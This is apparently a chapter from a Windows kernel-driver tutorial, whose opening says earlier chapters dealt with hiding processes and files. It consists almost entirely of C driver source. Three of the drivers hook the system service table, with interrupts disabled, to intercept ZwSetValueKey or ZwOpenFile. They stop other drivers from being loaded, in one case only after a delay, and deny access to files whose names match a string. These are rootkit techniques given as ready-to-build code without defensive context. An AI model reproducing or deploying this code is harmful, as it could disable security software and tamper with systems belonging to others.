stop a device driver from being loaded

Stop a Device Driver from being Loaded

We have had enough about processes and threads and files and hiding them. This chapter is different. It starts off with telling us how you can stop a device driver from being loaded by our device driver. Here goes

#include <ntddk.h>

#include <stdio.h>

NTSYSAPI NTSTATUS NTAPI ZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);

typedef struct

{

unsigned int *ServiceTableBase;

unsigned int *ServiceCounterTableBase;

unsigned int NumberOfServices;

unsigned char *ParamTableBase;

} sdt;

__declspec(dllimport) sdt KeServiceDescriptorTable;

typedef NTSTATUS (NTAPI *qtype)(HANDLE,PUNICODE_STRING,ULONG,ULONG,PVOID,ULONG);

qtype OldZwSetValueKey;

NTSTATUS NewZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize)

{

NTSTATUS status;

PVOID Object;

WCHAR buf[1024];

int bytes;

WCHAR *p;

ObReferenceObjectByHandle(KeyHandle,0,0,KernelMode,&Object,NULL);

ObQueryNameString(Object,(PUNICODE_STRING)buf,sizeof(buf),&bytes);

ObDereferenceObject(Object);

//p = ((PUNICODE_STRING)buf)->Buffer;

p = buf + 4;

if (wcsnicmp(L"\\Registry\\Machine\\System\\ControlSet001\\Services", p, 47) == 0)

{

DbgPrint("%S",p);

DbgPrint("ValueName=%S bytes=%d",ValueName->Buffer,bytes);

if (_wcsicmp(L"Type", ValueName->Buffer)==0)

return STATUS_ACCESS_DENIED;

}

status = OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);

return status;

}

long no;

NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)

{

DbgPrint("IRP_MJ_CREATE\n");

IoCompleteRequest(Irp, IO_NO_INCREMENT);

return(STATUS_SUCCESS);

}

VOID DriverUnload(PDRIVER_OBJECT DriverObject)

{

DbgPrint("Driver Unloading");

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwSetValueKey;

_asm sti

}

NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)

{

char *p;

driverObject->DriverUnload = DriverUnload;

driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;

DbgPrint("Vijay Driver");

p = (char *) ZwSetValueKey;

p = p + 1;

no = *(long *)p;

OldZwSetValueKey = (qtype)KeServiceDescriptorTable. ServiceTableBase [no];

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwSetValueKey;

_asm sti

return(STATUS_SUCCESS);

}

#include <ntddk.h>

#include <stdio.h>

NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)

{

IoCompleteRequest(pIrp, IO_NO_INCREMENT);

return(STATUS_SUCCESS);

}

PKTIMER gTimer;

PKDPC gDPCP;

VOID DriverUnload(PDRIVER_OBJECT DriverObject)

{

DbgPrint("Unloading");

KeCancelTimer( gTimer );

ExFreePool( gTimer );

ExFreePool( gDPCP );

}

__int64 l1,l2,diff;

VOID abc(PKDPC Dpc,PVOID DeferredContext,PVOID sys1,PVOID sys2)

{

KeQuerySystemTime((PLARGE_INTEGER)&l2);

diff = l2 - l1;

DbgPrint("l1=%I64d l2=%I64d diff=%I64d",l1,l2,diff);

diff = diff/10000000;

DbgPrint("Diff1=%d",diff);

}

LARGE_INTEGER timeout;

NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)

{

driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;

driverObject->DriverUnload = DriverUnload;

DbgPrint("Vijay 2");

gTimer = ExAllocatePool (NonPagedPool,sizeof(KTIMER));

gDPCP = ExAllocatePool(NonPagedPool,sizeof(KDPC));

KeInitializeTimer (gTimer);

KeInitializeDpc (gDPCP,abc,0);

KeSetTimerEx (gTimer,timeout,5000,gDPCP);

KeQuerySystemTime((PLARGE_INTEGER)&l1);

return(STATUS_SUCCESS);

}

#include <ntddk.h>

#include <stdio.h>

NTSYSAPI NTSTATUS NTAPI ZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);

typedef struct

{

unsigned int *ServiceTableBase;

unsigned int *ServiceCounterTableBase;

unsigned int NumberOfServices;

unsigned char *ParamTableBase;

} sdt;

__declspec(dllimport) sdt KeServiceDescriptorTable;

typedef NTSTATUS (NTAPI *qtype)(HANDLE,PUNICODE_STRING,ULONG,ULONG,PVOID,ULONG);

qtype OldZwSetValueKey;

__int64 l1,l2,diff;

NTSTATUS NewZwSetValueKey(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize)

{

NTSTATUS status;

PVOID Object;

WCHAR buf[1024];

int bytes;

WCHAR *p;

ObReferenceObjectByHandle(KeyHandle,0,0,KernelMode,&Object,NULL);

ObQueryNameString(Object,(PUNICODE_STRING)buf,sizeof(buf),&bytes);

ObDereferenceObject(Object);

//p = ((PUNICODE_STRING)buf)->Buffer;

p = buf + 4;

if (wcsnicmp(L"\\Registry\\Machine\\System\\ControlSet001\\Services", p, 47) == 0)

{

DbgPrint("%S",p);

DbgPrint("ValueName=%S bytes=%d",ValueName->Buffer,bytes);

KeQuerySystemTime((PLARGE_INTEGER)&l2);

diff = l2 - l1;

diff = diff/10000000;

if (_wcsicmp(L"Type", ValueName->Buffer)==0 && diff >= 25)

return STATUS_ACCESS_DENIED;

}

status = OldZwSetValueKey(KeyHandle,ValueName,TitleIndex,Type,Data,DataSize);

return status;

}

long no;

NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)

{

DbgPrint("IRP_MJ_CREATE\n");

IoCompleteRequest(Irp, IO_NO_INCREMENT);

return(STATUS_SUCCESS);

}

VOID DriverUnload(PDRIVER_OBJECT DriverObject)

{

DbgPrint("Driver Unloading");

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwSetValueKey;

_asm sti

}

NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)

{

char *p;

KeQuerySystemTime((PLARGE_INTEGER)&l1);

driverObject->DriverUnload = DriverUnload;

driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;

DbgPrint("Vijay Driver");

p = (char *) ZwSetValueKey;

p = p + 1;

no = *(long *)p;

OldZwSetValueKey = (qtype)KeServiceDescriptorTable. ServiceTableBase [no];

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwSetValueKey;

_asm sti

return(STATUS_SUCCESS);

}

#include <ntddk.h>

#include <stdio.h>

NTSYSAPI NTSTATUS NTAPI ZwOpenFile(PHANDLE phFile,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK pIoStatusBlock,ULONG ShareMode,ULONG OpenMode);

typedef struct

{

unsigned int *ServiceTableBase;

unsigned int *ServiceCounterTableBase;

unsigned int NumberOfServices;

unsigned char *ParamTableBase;

} sdt;

__declspec(dllimport) sdt KeServiceDescriptorTable;

typedef NTSTATUS (NTAPI *qtype)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,PIO_STATUS_BLOCK,ULONG,ULONG);

qtype OldZwOpenFile;

NTSTATUS NewZwOpenFile(PHANDLE phFile,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK pIoStatusBlock,ULONG ShareMode,ULONG OpenMode)

{

NTSTATUS status;

DbgPrint("ZwOpenFile");

if ( ObjectAttributes != 0)

{

int i;

i = wcsstr(ObjectAttributes->ObjectName->Buffer,L"r2");

DbgPrint("Name=%S i=%d",ObjectAttributes->ObjectName->Buffer,i);

if ( i != 0)

return STATUS_ACCESS_DENIED;

}

status = OldZwOpenFile(phFile,DesiredAccess,ObjectAttributes,pIoStatusBlock,ShareMode,OpenMode);

return status;

}

long no;

NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)

{

DbgPrint("IRP_MJ_CREATE\n");

IoCompleteRequest(Irp, IO_NO_INCREMENT);

return(STATUS_SUCCESS);

}

VOID DriverUnload(PDRIVER_OBJECT DriverObject)

{

DbgPrint("Driver Unloading");

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwOpenFile;

_asm sti

}

NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)

{

char *p;

driverObject->DriverUnload = DriverUnload;

driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;

DbgPrint("Vijay Driver");

p = (char *) ZwOpenFile;

p = p + 1;

no = *(long *)p;

OldZwOpenFile = (qtype)KeServiceDescriptorTable. ServiceTableBase [no];

_asm cli

KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwOpenFile;

_asm sti

return(STATUS_SUCCESS);

}

Back to the main page